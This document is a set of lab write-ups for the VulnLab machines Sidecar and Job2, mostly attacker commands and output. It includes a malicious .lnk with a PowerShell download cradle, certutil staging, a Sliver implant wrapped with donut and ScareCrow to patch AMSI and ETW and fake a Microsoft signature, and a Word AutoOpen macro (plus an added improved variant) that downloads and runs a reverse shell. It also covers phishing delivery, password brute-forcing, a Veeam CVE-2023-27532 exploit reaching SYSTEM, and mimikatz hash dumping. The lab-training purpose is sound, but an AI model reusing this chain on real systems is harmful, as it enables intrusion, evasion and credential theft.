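    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    "IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient)"
                    ".DownloadData('http://10.8.2.138/puckshell.txt')))")
    f = parse_lnk(lnk)
    print(f["relative_path"], "|", f["arguments"], "| show:", f["show_command"])
    print("flagged:", flag_suspicious(f))
```

Run the parser over every .lnk on the share (smbclient get, then parse_lnk on the bytes); a shortcut whose arguments contain a download cradle, or whose icon lives on \\attacker\share, is the artefact this attack leaves behind.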


Uploading the malicious shortcut to the Public share on DC01 (null session):

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the script over HTTP; the repeated GETs show the shortcut being opened more than once:

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -


Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

and the domain accounts:

c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

Stage nc64.exe into c:\temp with certutil:

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start the Sliver C2 server and generate an mTLS implant:

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Convert the implant to position-independent shellcode with donut (here the implant was copied to payload.exe):

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then wrap loader.bin with ScareCrow, which embeds the encrypted shellcode in a loader posing as OneNote.exe and signs it with a fake certificate:

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

Got a session, but after uploading SharpHound.exe, my sliver session gets disconnected.

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So the next step is to deliver the beacon through a new .lnk file whose target downloads and runs it:

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

 

To be continued …

 

vulnlab-job2

job2, a hard Windows machine: from phishing to admin

Preparation

1. Enable Developer Tools in the ribbon menu to get access to macros.
2. Name your macro AutoOpen() if you are working with Word 2016+.
3. Select the current document as the place to store the macro.
4. Don’t use .docx as the file extension, since it does not allow embedded macros; use .doc or .docm.

Do the testing on your own LAN first (a Kali box and a Windows 11 PC).

I used this macro:

Sub AutoOpen()

  ' Shell() returns as soon as the child process has been started, so the two
  ' calls below run concurrently: the download is still in progress when b fires.
  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open puck3.docm twice: on the first open the second Shell call fires before curl has finished writing rcat.exe, so that run only downloads it; the second open executes rcat.exe.
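As an added example (not the author's macro), the same stager written so that a single open is enough. VBA's Shell() is asynchronous, which is why the macro above needs two runs. WScript.Shell.Run with bWaitOnReturn set to True blocks until curl exits and returns its exit code, so the payload is only launched once the file is on disk. The address, port and file names are the lab values from the macro above; curl.exe is assumed to be present, which holds on Windows 10 1803+ and Server 2019+. Because the simulation on the box opens each attachment only once, one mail would be expected to suffice with this variant.

```vb
' Added example, not from the original post: a single-open variant of the
' AutoOpen stager. Shell() in VBA returns immediately, so the original macro
' races the download against the execution. WScript.Shell.Run with
' bWaitOnReturn = True blocks until curl has exited.
' Host, port and file names are placeholders copied from the lab setup.
Sub AutoOpen()
    Dim wsh As Object
    Dim url As String, dest As String
    Dim rc As Long

    Set wsh = CreateObject("WScript.Shell")
    url = "http://192.168.1.41/rcat.exe"
    dest = "C:\Windows\Tasks\rcat_192.168.1.41_443.exe"

    ' Window style 0 = hidden; True = wait for the process to exit.
    ' Run returns the child's exit code; curl returns 0 on success.
    rc = wsh.Run("curl.exe -s """ & url & """ -o """ & dest & """", 0, True)

    ' Only launch the payload if the download completed and the file exists.
    If rc = 0 And Len(Dir(dest)) > 0 Then
        ' Do not wait here: the reverse shell keeps running after Word closes.
        wsh.Run """" & dest & """", 0, False
    End If
End Sub
```

The -s flag keeps curl quiet; if the download fails (non-zero exit code or missing file) nothing is executed, so a half-written binary is never started.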

Once you receive a reverse shell on the LAN, start the job2 box.

Here we go …

We start with an nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine the website and find out how to apply for the job: send a CV to hr@job2.vl.

Send your CV twice (first change the LAN test IP in the macro of puck3.docm to your tun0 IP on the VulnLab VPN):

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

 

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

It found Ferdinand’s password (redacted below).

Log in with evil-winrm and find Veeam Backup & Replication installed. Its backup service listens on TCP 9401 and is affected by CVE-2023-27532: an unauthenticated caller that can reach that port can talk to the service, which leaks the stored credentials and, with the "RCE-only" VeeamHax proof of concept, runs a command in the context of the service. The service runs as LocalSystem, so this is the path to SYSTEM on JOB2:

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 

Upload the Veeam DLLs the PoC links against into C:\temp and run VeeamHax.exe against the local service, pointing it at the rcat reverse shell binary:

*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

and catch the SYSTEM shell:

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

 

That’s all.

Beyond root: dumping the local SAM with mimikatz. The first lsadump::sam fails with 0x00000005 (access denied) because SeDebugPrivilege alone does not grant access to the SAM hive; token::elevate impersonates a SYSTEM token and the second attempt succeeds.

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

 

How the phishing is simulated: Julian’s Startup folder contains phishs.bat,

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

which runs

powershell \windows\phishsim.ps1

and phishsim.ps1 watches C:\programdata\attachments, opens every new file (except those containing a "~") in Word for 45 seconds, kills Word and deletes the file:

Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

for(;;){
    sleep 45
}